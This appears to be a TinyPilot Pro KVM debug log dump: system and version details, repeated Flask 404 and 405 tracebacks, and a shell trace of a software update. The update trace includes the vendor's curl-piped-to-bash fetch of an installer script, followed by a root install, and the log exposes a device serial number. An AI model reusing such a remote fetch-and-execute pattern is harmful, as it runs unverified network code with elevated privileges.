TinyPilot Pro log dump https://tinypilotkvm.com Timestamp: 2024-08-15T02:07:48+01:00 Software versions TinyPilot version: 2.6.4 uStreamer version: 5.43 System information OS version: Linux tinypilot 6.1.21-v8+ #1642 SMP PREEMPT Mon Apr 3 17:24:16 BST 2023 aarch64 GNU/Linux Kernel architecture: aarch64 Userland architecture: armhf (32-bit) Distribution name: Raspbian Distribution version: 11 Hardware information Hardware: BCM2835 Revision: b03115 Model: Raspberry Pi 4 Model B Rev 1.5 TinyPilot state Read-only filesystem: off SSH access: enabled Network interfaces: eth0 (up) lo (unknown) wlan0 (down) Static IP: Not set Mouse jiggler: disabled CPU Temperature: 52.5'C CPU throttled since boot: no Voltage issues: no Streaming mode Selected mode: H264 Current mode: MJPEG TinyPilot settings.yml janus_stun_port: 19302 janus_stun_server: stun.l.google.com ustreamer_desired_fps: 15 ustreamer_h264_bitrate: 3100 ustreamer_quality: 60 TinyPilot configuration [Unit] Description=TinyPilot - RPi-based virtual KVM BindsTo=nginx.service After=syslog.target network.target nginx.service StartLimitIntervalSec=0 [Service] Type=simple User=tinypilot WorkingDirectory=/opt/tinypilot ExecStart=/opt/tinypilot/venv/bin/python app/main.py Environment=APP_SETTINGS_FILE=/home/tinypilot/app_settings.cfg Restart=always [Install] WantedBy=multi-user.target TinyPilot logs Aug 14 11:40:58 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1469, in dispatch_request Aug 14 11:40:58 tinypilot python[1662]: return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) Aug 14 11:40:58 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 502, in Aug 14 11:40:58 tinypilot python[1662]: view_func=lambda **kw: self_ref().send_static_file(**kw), # type: ignore # noqa: B950 Aug 14 11:40:58 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/scaffold.py", line 318, in send_static_file Aug 14 11:40:58 tinypilot python[1662]: return send_from_directory( Aug 14 11:40:58 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/helpers.py", line 557, in send_from_directory Aug 14 11:40:58 tinypilot python[1662]: return werkzeug.utils.send_from_directory( # type: ignore[return-value] Aug 14 11:40:58 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/werkzeug/utils.py", line 574, in send_from_directory Aug 14 11:40:58 tinypilot python[1662]: raise NotFound() Aug 14 11:40:58 tinypilot python[1662]: werkzeug.exceptions.NotFound: 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. Aug 14 12:06:40 tinypilot python[1662]: 2024-08-14 12:06:40.726 __main__ ERROR 405 Method Not Allowed: The method is not allowed for the requested URL. Aug 14 12:06:40 tinypilot python[1662]: Traceback (most recent call last): Aug 14 12:06:40 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1484, in full_dispatch_request Aug 14 12:06:40 tinypilot python[1662]: rv = self.dispatch_request() Aug 14 12:06:40 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1458, in dispatch_request Aug 14 12:06:40 tinypilot python[1662]: self.raise_routing_exception(req) Aug 14 12:06:40 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1440, in raise_routing_exception Aug 14 12:06:40 tinypilot python[1662]: raise request.routing_exception # type: ignore Aug 14 12:06:40 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/ctx.py", line 353, in match_request Aug 14 12:06:40 tinypilot python[1662]: result = self.url_adapter.match(return_rule=True) # type: ignore Aug 14 12:06:40 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/werkzeug/routing/map.py", line 650, in match Aug 14 12:06:40 tinypilot python[1662]: raise MethodNotAllowed(valid_methods=list(e.have_match_for)) from None Aug 14 12:06:40 tinypilot python[1662]: werkzeug.exceptions.MethodNotAllowed: 405 Method Not Allowed: The method is not allowed for the requested URL. Aug 14 12:44:06 tinypilot python[1662]: 2024-08-14 12:44:06.750 __main__ ERROR 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. Aug 14 12:44:06 tinypilot python[1662]: Traceback (most recent call last): Aug 14 12:44:06 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1484, in full_dispatch_request Aug 14 12:44:06 tinypilot python[1662]: rv = self.dispatch_request() Aug 14 12:44:06 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1469, in dispatch_request Aug 14 12:44:06 tinypilot python[1662]: return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) Aug 14 12:44:06 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 502, in Aug 14 12:44:06 tinypilot python[1662]: view_func=lambda **kw: self_ref().send_static_file(**kw), # type: ignore # noqa: B950 Aug 14 12:44:06 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/scaffold.py", line 318, in send_static_file Aug 14 12:44:06 tinypilot python[1662]: return send_from_directory( Aug 14 12:44:06 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/helpers.py", line 557, in send_from_directory Aug 14 12:44:06 tinypilot python[1662]: return werkzeug.utils.send_from_directory( # type: ignore[return-value] Aug 14 12:44:06 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/werkzeug/utils.py", line 574, in send_from_directory Aug 14 12:44:06 tinypilot python[1662]: raise NotFound() Aug 14 12:44:06 tinypilot python[1662]: werkzeug.exceptions.NotFound: 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. Aug 14 12:44:54 tinypilot python[1662]: 2024-08-14 12:44:54.838 __main__ ERROR 405 Method Not Allowed: The method is not allowed for the requested URL. Aug 14 12:44:54 tinypilot python[1662]: Traceback (most recent call last): Aug 14 12:44:54 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1484, in full_dispatch_request Aug 14 12:44:54 tinypilot python[1662]: rv = self.dispatch_request() Aug 14 12:44:54 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1458, in dispatch_request Aug 14 12:44:54 tinypilot python[1662]: self.raise_routing_exception(req) Aug 14 12:44:54 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1440, in raise_routing_exception Aug 14 12:44:54 tinypilot python[1662]: raise request.routing_exception # type: ignore Aug 14 12:44:54 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/ctx.py", line 353, in match_request Aug 14 12:44:54 tinypilot python[1662]: result = self.url_adapter.match(return_rule=True) # type: ignore Aug 14 12:44:54 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/werkzeug/routing/map.py", line 650, in match Aug 14 12:44:54 tinypilot python[1662]: raise MethodNotAllowed(valid_methods=list(e.have_match_for)) from None Aug 14 12:44:54 tinypilot python[1662]: werkzeug.exceptions.MethodNotAllowed: 405 Method Not Allowed: The method is not allowed for the requested URL. Aug 14 13:07:06 tinypilot python[1662]: 2024-08-14 13:07:06.084 __main__ ERROR 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. Aug 14 13:07:06 tinypilot python[1662]: Traceback (most recent call last): Aug 14 13:07:06 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1484, in full_dispatch_request Aug 14 13:07:06 tinypilot python[1662]: rv = self.dispatch_request() Aug 14 13:07:06 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1469, in dispatch_request Aug 14 13:07:06 tinypilot python[1662]: return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) Aug 14 13:07:06 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 502, in Aug 14 13:07:06 tinypilot python[1662]: view_func=lambda **kw: self_ref().send_static_file(**kw), # type: ignore # noqa: B950 Aug 14 13:07:06 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/scaffold.py", line 318, in send_static_file Aug 14 13:07:06 tinypilot python[1662]: return send_from_directory( Aug 14 13:07:06 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/helpers.py", line 557, in send_from_directory Aug 14 13:07:06 tinypilot python[1662]: return werkzeug.utils.send_from_directory( # type: ignore[return-value] Aug 14 13:07:06 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/werkzeug/utils.py", line 574, in send_from_directory Aug 14 13:07:06 tinypilot python[1662]: raise NotFound() Aug 14 13:07:06 tinypilot python[1662]: werkzeug.exceptions.NotFound: 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. Aug 14 17:32:08 tinypilot python[1662]: 2024-08-14 17:32:08.872 __main__ ERROR 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. Aug 14 17:32:08 tinypilot python[1662]: Traceback (most recent call last): Aug 14 17:32:08 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1484, in full_dispatch_request Aug 14 17:32:08 tinypilot python[1662]: rv = self.dispatch_request() Aug 14 17:32:08 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1469, in dispatch_request Aug 14 17:32:08 tinypilot python[1662]: return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) Aug 14 17:32:08 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 502, in Aug 14 17:32:08 tinypilot python[1662]: view_func=lambda **kw: self_ref().send_static_file(**kw), # type: ignore # noqa: B950 Aug 14 17:32:08 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/scaffold.py", line 318, in send_static_file Aug 14 17:32:08 tinypilot python[1662]: return send_from_directory( Aug 14 17:32:08 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/helpers.py", line 557, in send_from_directory Aug 14 17:32:08 tinypilot python[1662]: return werkzeug.utils.send_from_directory( # type: ignore[return-value] Aug 14 17:32:08 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/werkzeug/utils.py", line 574, in send_from_directory Aug 14 17:32:08 tinypilot python[1662]: raise NotFound() Aug 14 17:32:08 tinypilot python[1662]: werkzeug.exceptions.NotFound: 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. Aug 14 18:49:22 tinypilot python[1662]: 2024-08-14 18:49:22.713 __main__ ERROR 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. Aug 14 18:49:22 tinypilot python[1662]: Traceback (most recent call last): Aug 14 18:49:22 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1484, in full_dispatch_request Aug 14 18:49:22 tinypilot python[1662]: rv = self.dispatch_request() Aug 14 18:49:22 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1469, in dispatch_request Aug 14 18:49:22 tinypilot python[1662]: return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) Aug 14 18:49:22 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 502, in Aug 14 18:49:22 tinypilot python[1662]: view_func=lambda **kw: self_ref().send_static_file(**kw), # type: ignore # noqa: B950 Aug 14 18:49:22 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/scaffold.py", line 318, in send_static_file Aug 14 18:49:22 tinypilot python[1662]: return send_from_directory( Aug 14 18:49:22 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/helpers.py", line 557, in send_from_directory Aug 14 18:49:22 tinypilot python[1662]: return werkzeug.utils.send_from_directory( # type: ignore[return-value] Aug 14 18:49:22 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/werkzeug/utils.py", line 574, in send_from_directory Aug 14 18:49:22 tinypilot python[1662]: raise NotFound() Aug 14 18:49:22 tinypilot python[1662]: werkzeug.exceptions.NotFound: 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. Aug 14 21:18:44 tinypilot python[1662]: 2024-08-14 21:18:44.156 __main__ ERROR 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. Aug 14 21:18:44 tinypilot python[1662]: Traceback (most recent call last): Aug 14 21:18:44 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1484, in full_dispatch_request Aug 14 21:18:44 tinypilot python[1662]: rv = self.dispatch_request() Aug 14 21:18:44 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1469, in dispatch_request Aug 14 21:18:44 tinypilot python[1662]: return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) Aug 14 21:18:44 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 502, in Aug 14 21:18:44 tinypilot python[1662]: view_func=lambda **kw: self_ref().send_static_file(**kw), # type: ignore # noqa: B950 Aug 14 21:18:44 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/scaffold.py", line 318, in send_static_file Aug 14 21:18:44 tinypilot python[1662]: return send_from_directory( Aug 14 21:18:44 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/helpers.py", line 557, in send_from_directory Aug 14 21:18:44 tinypilot python[1662]: return werkzeug.utils.send_from_directory( # type: ignore[return-value] Aug 14 21:18:44 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/werkzeug/utils.py", line 574, in send_from_directory Aug 14 21:18:44 tinypilot python[1662]: raise NotFound() Aug 14 21:18:44 tinypilot python[1662]: werkzeug.exceptions.NotFound: 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. Aug 14 21:18:44 tinypilot python[1662]: 2024-08-14 21:18:44.171 __main__ ERROR 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. Aug 14 21:18:44 tinypilot python[1662]: Traceback (most recent call last): Aug 14 21:18:44 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1484, in full_dispatch_request Aug 14 21:18:44 tinypilot python[1662]: rv = self.dispatch_request() Aug 14 21:18:44 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1469, in dispatch_request Aug 14 21:18:44 tinypilot python[1662]: return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) Aug 14 21:18:44 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 502, in Aug 14 21:18:44 tinypilot python[1662]: view_func=lambda **kw: self_ref().send_static_file(**kw), # type: ignore # noqa: B950 Aug 14 21:18:44 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/scaffold.py", line 318, in send_static_file Aug 14 21:18:44 tinypilot python[1662]: return send_from_directory( Aug 14 21:18:44 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/helpers.py", line 557, in send_from_directory Aug 14 21:18:44 tinypilot python[1662]: return werkzeug.utils.send_from_directory( # type: ignore[return-value] Aug 14 21:18:44 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/werkzeug/utils.py", line 574, in send_from_directory Aug 14 21:18:44 tinypilot python[1662]: raise NotFound() Aug 14 21:18:44 tinypilot python[1662]: werkzeug.exceptions.NotFound: 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. Aug 14 21:18:44 tinypilot python[1662]: 2024-08-14 21:18:44.188 __main__ ERROR 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. Aug 14 21:18:44 tinypilot python[1662]: Traceback (most recent call last): Aug 14 21:18:44 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1484, in full_dispatch_request Aug 14 21:18:44 tinypilot python[1662]: rv = self.dispatch_request() Aug 14 21:18:44 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1469, in dispatch_request Aug 14 21:18:44 tinypilot python[1662]: return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) Aug 14 21:18:44 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 502, in Aug 14 21:18:44 tinypilot python[1662]: view_func=lambda **kw: self_ref().send_static_file(**kw), # type: ignore # noqa: B950 Aug 14 21:18:44 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/scaffold.py", line 318, in send_static_file Aug 14 21:18:44 tinypilot python[1662]: return send_from_directory( Aug 14 21:18:44 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/helpers.py", line 557, in send_from_directory Aug 14 21:18:44 tinypilot python[1662]: return werkzeug.utils.send_from_directory( # type: ignore[return-value] Aug 14 21:18:44 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/werkzeug/utils.py", line 574, in send_from_directory Aug 14 21:18:44 tinypilot python[1662]: raise NotFound() Aug 14 21:18:44 tinypilot python[1662]: werkzeug.exceptions.NotFound: 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. Aug 14 21:18:44 tinypilot python[1662]: 2024-08-14 21:18:44.218 __main__ ERROR 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. Aug 14 21:18:44 tinypilot python[1662]: Traceback (most recent call last): Aug 14 21:18:44 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1484, in full_dispatch_request Aug 14 21:18:44 tinypilot python[1662]: rv = self.dispatch_request() Aug 14 21:18:44 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1469, in dispatch_request Aug 14 21:18:44 tinypilot python[1662]: return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) Aug 14 21:18:44 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 502, in Aug 14 21:18:44 tinypilot python[1662]: view_func=lambda **kw: self_ref().send_static_file(**kw), # type: ignore # noqa: B950 Aug 14 21:18:44 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/scaffold.py", line 318, in send_static_file Aug 14 21:18:44 tinypilot python[1662]: return send_from_directory( Aug 14 21:18:44 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/helpers.py", line 557, in send_from_directory Aug 14 21:18:44 tinypilot python[1662]: return werkzeug.utils.send_from_directory( # type: ignore[return-value] Aug 14 21:18:44 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/werkzeug/utils.py", line 574, in send_from_directory Aug 14 21:18:44 tinypilot python[1662]: raise NotFound() Aug 14 21:18:44 tinypilot python[1662]: werkzeug.exceptions.NotFound: 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. Aug 14 22:50:19 tinypilot python[1662]: 2024-08-14 22:50:19.148 __main__ ERROR 405 Method Not Allowed: The method is not allowed for the requested URL. Aug 14 22:50:19 tinypilot python[1662]: Traceback (most recent call last): Aug 14 22:50:19 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1484, in full_dispatch_request Aug 14 22:50:19 tinypilot python[1662]: rv = self.dispatch_request() Aug 14 22:50:19 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1458, in dispatch_request Aug 14 22:50:19 tinypilot python[1662]: self.raise_routing_exception(req) Aug 14 22:50:19 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1440, in raise_routing_exception Aug 14 22:50:19 tinypilot python[1662]: raise request.routing_exception # type: ignore Aug 14 22:50:19 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/ctx.py", line 353, in match_request Aug 14 22:50:19 tinypilot python[1662]: result = self.url_adapter.match(return_rule=True) # type: ignore Aug 14 22:50:19 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/werkzeug/routing/map.py", line 650, in match Aug 14 22:50:19 tinypilot python[1662]: raise MethodNotAllowed(valid_methods=list(e.have_match_for)) from None Aug 14 22:50:19 tinypilot python[1662]: werkzeug.exceptions.MethodNotAllowed: 405 Method Not Allowed: The method is not allowed for the requested URL. Aug 14 23:45:16 tinypilot python[1662]: 2024-08-14 23:45:16.474 __main__ ERROR 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. Aug 14 23:45:16 tinypilot python[1662]: Traceback (most recent call last): Aug 14 23:45:16 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1484, in full_dispatch_request Aug 14 23:45:16 tinypilot python[1662]: rv = self.dispatch_request() Aug 14 23:45:16 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 1469, in dispatch_request Aug 14 23:45:16 tinypilot python[1662]: return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) Aug 14 23:45:16 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/app.py", line 502, in Aug 14 23:45:16 tinypilot python[1662]: view_func=lambda **kw: self_ref().send_static_file(**kw), # type: ignore # noqa: B950 Aug 14 23:45:16 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/scaffold.py", line 318, in send_static_file Aug 14 23:45:16 tinypilot python[1662]: return send_from_directory( Aug 14 23:45:16 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/flask/helpers.py", line 557, in send_from_directory Aug 14 23:45:16 tinypilot python[1662]: return werkzeug.utils.send_from_directory( # type: ignore[return-value] Aug 14 23:45:16 tinypilot python[1662]: File "/opt/tinypilot/venv/lib/python3.9/site-packages/werkzeug/utils.py", line 574, in send_from_directory Aug 14 23:45:16 tinypilot python[1662]: raise NotFound() Aug 14 23:45:16 tinypilot python[1662]: werkzeug.exceptions.NotFound: 404 Not Found: The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. Aug 15 01:20:00 tinypilot python[1662]: 2024-08-15 01:20:00.790 socket_api INFO Client RIMAVEPtMrOffY8UAABd disconnected Aug 15 02:01:01 tinypilot python[1662]: 2024-08-15 02:01:01.468 socket_api INFO Client cpleudiyinSr0H0EAABf connected Aug 15 02:04:19 tinypilot python[1662]: 2024-08-15 02:04:19.202 socket_api INFO Client cpleudiyinSr0H0EAABf disconnected Aug 15 02:05:35 tinypilot python[1662]: 2024-08-15 02:05:35.637 socket_api INFO Client 0j48LSu1B7cdc63MAABh connected Aug 15 02:07:48 tinypilot sudo[1320]: tinypilot : PWD=/opt/tinypilot ; USER=root ; COMMAND=/opt/tinypilot-privileged/scripts/collect-debug-logs -q Aug 15 02:07:48 tinypilot sudo[1320]: pam_unix(sudo:session): session opened for user root(uid=0) by (uid=111) Aug 15 02:07:49 tinypilot runuser[1335]: pam_unix(runuser:session): session opened for user tinypilot(uid=111) by (uid=0) Aug 15 02:07:49 tinypilot runuser[1335]: pam_unix(runuser:session): session closed for user tinypilot Aug 15 02:07:49 tinypilot runuser[1341]: pam_unix(runuser:session): session opened for user tinypilot(uid=111) by (uid=0) Aug 15 02:07:49 tinypilot runuser[1341]: pam_unix(runuser:session): session closed for user tinypilot Aug 15 02:07:49 tinypilot runuser[1350]: pam_unix(runuser:session): session opened for user tinypilot(uid=111) by (uid=0) Aug 15 02:07:50 tinypilot python[1357]: 2024-08-15 02:07:50.513 app.main INFO Starting app Aug 15 02:07:50 tinypilot python[1357]: 2024-08-15 02:07:50.584 db.store INFO Loading database migrations from /opt/tinypilot/app/db/migrations/*.sql Aug 15 02:07:50 tinypilot python[1357]: 2024-08-15 02:07:50.586 db.store INFO Read 7 database migrations from disk Aug 15 02:07:50 tinypilot runuser[1350]: pam_unix(runuser:session): session closed for user tinypilot TinyPilot update logs 2024-08-06 04:38:14.711 __main__ INFO Starting TinyPilot update 2024-08-06 04:38:14.711 __main__ INFO Launching update script: /opt/tinypilot-privileged/scripts/update + set -u + set -e + readonly VERSION_FILE=/home/tinypilot/target-version + VERSION_FILE=/home/tinypilot/target-version + SCRIPT_ARGS=() + [[ -f /home/tinypilot/target-version ]] ++ cat /home/tinypilot/target-version + VERSION=2.6.4 + SCRIPT_ARGS+=(--version "${VERSION}") + readonly SCRIPT_ARGS + curl --silent --show-error https://gk.tinypilotkvm.com/get-tinypilot-pro.sh + bash -s -- --version 2.6.4 + TARGET_VERSION= + ALLOW_REINSTALL=false + [[ 2 -gt 0 ]] + case "$1" in + TARGET_VERSION=2.6.4 + shift + shift + [[ 0 -gt 0 ]] + readonly ALLOW_REINSTALL + readonly LEGACY_INSTALLER_DIR=/opt/tinypilot-updater + LEGACY_INSTALLER_DIR=/opt/tinypilot-updater + readonly RAMDISK_SIZE_MIB=560 + RAMDISK_SIZE_MIB=560 ++ free --mebi ++ cut --delimiter ' ' --fields 7 ++ grep --fixed-strings Mem: ++ tr --squeeze-repeats ' ' + AVAILABLE_MEMORY_MIB=1418 + readonly AVAILABLE_MEMORY_MIB + INSTALLER_DIR=/mnt/tinypilot-installer + trap clean_up EXIT + (( 1418 >= 560 )) + sudo mkdir /mnt/tinypilot-installer + sudo mount --types tmpfs --options size=560m --source tmpfs --target /mnt/tinypilot-installer --verbose mount: tmpfs mounted on /mnt/tinypilot-installer. + readonly INSTALLER_DIR + readonly TMPDIR=/mnt/tinypilot-installer/tmp + TMPDIR=/mnt/tinypilot-installer/tmp + export TMPDIR + sudo mkdir /mnt/tinypilot-installer/tmp + readonly BUNDLE_FILE=/mnt/tinypilot-installer/bundle.tgz + BUNDLE_FILE=/mnt/tinypilot-installer/bundle.tgz + readonly TARGET_VERSION_FILE=/mnt/tinypilot-installer/target_version.json + TARGET_VERSION_FILE=/mnt/tinypilot-installer/target_version.json + readonly TINYPILOT_VERSION_FILE=/opt/tinypilot/VERSION + TINYPILOT_VERSION_FILE=/opt/tinypilot/VERSION + CURRENT_VERSION= + [[ -f /opt/tinypilot/VERSION ]] ++ cat /opt/tinypilot/VERSION + CURRENT_VERSION=2.6.1 + readonly CURRENT_VERSION + HAS_COMMUNITY_INSTALLED=0 + readonly TINYPILOT_README_FILE=/opt/tinypilot/README.md + TINYPILOT_README_FILE=/opt/tinypilot/README.md + [[ -f /opt/tinypilot/README.md ]] ++ head -n 1 /opt/tinypilot/README.md + [[ # TinyPilot Pro == \#\ \T\i\n\y\P\i\l\o\t ]] + readonly HAS_COMMUNITY_INSTALLED + [[ -z 2.6.4 ]] + readonly TARGET_VERSION + [[ 2.6.1 == \2\.\6\.\4 ]] + readonly TINYPILOT_LICENSE_KEY=UNSPECIFIED + TINYPILOT_LICENSE_KEY=UNSPECIFIED ++ tr --delete '\0' + DEVICE_SERIAL_NUMBER=1000000063bd9ffa + readonly DEVICE_SERIAL_NUMBER ++ curl https://gk.tinypilotkvm.com/pro/download/2.6.4 --location --header 'TP-License: UNSPECIFIED' --header 'TP-Device-Serial-Number: 1000000063bd9ffa' --output /mnt/tinypilot-installer/bundle.tgz --write-out '%{http_code}' --silent + HTTP_CODE=200 + readonly HTTP_CODE + [[ 200 != \2\0\0 ]] + sudo tar --gunzip --extract --file /mnt/tinypilot-installer/bundle.tgz --directory /mnt/tinypilot-installer + sudo chown root:root --recursive /mnt/tinypilot-installer + [[ 0 -eq 1 ]] + pushd /mnt/tinypilot-installer /mnt/tinypilot-installer /opt/tinypilot + sudo TMPDIR=/mnt/tinypilot-installer/tmp ./install + grep -q '^Model *: Raspberry Pi 3' /proc/cpuinfo ++ lsb_release --id --short + [[ Raspbian == \R\a\s\p\b\i\a\n ]] ++ lsb_release --release --short + (( 11 < 11 )) ++ lsb_release --id --short + [[ Raspbian == \R\a\s\p\b\i\a\n ]] ++ lsb_release --release --short + (( 11 > 11 )) + grep -q boot=overlay /proc/cmdline ++ ls janus_1.0.1-1~bpo11+1_armhf.deb + JANUS_DEBIAN_PACKAGE=janus_1.0.1-1~bpo11+1_armhf.deb + readonly JANUS_DEBIAN_PACKAGE ++ ls ustreamer_5.43-20231004144402_armhf.deb + USTREAMER_DEBIAN_PACKAGE=ustreamer_5.43-20231004144402_armhf.deb + readonly USTREAMER_DEBIAN_PACKAGE ++ ls tinypilot_20240620111245_armhf.deb + TINYPILOT_DEBIAN_PACKAGE=tinypilot_20240620111245_armhf.deb + readonly TINYPILOT_DEBIAN_PACKAGE + apt-get update --allow-releaseinfo-change-suite Get:1 http://raspbian.raspberrypi.org/raspbian bullseye InRelease [15.0 kB] Get:2 http://archive.raspberrypi.org/debian bullseye InRelease [39.0 kB] Get:3 http://raspbian.raspberrypi.org/raspbian bullseye/main armhf Packages [13.2 MB] Get:4 http://archive.raspberrypi.org/debian bullseye/main armhf Packages [317 kB] Get:5 http://raspbian.raspberrypi.org/raspbian bullseye/non-free armhf Packages [106 kB] Fetched 13.7 MB in 7s (1,977 kB/s) Reading package lists... + apt-get install -y ./janus_1.0.1-1~bpo11+1_armhf.deb 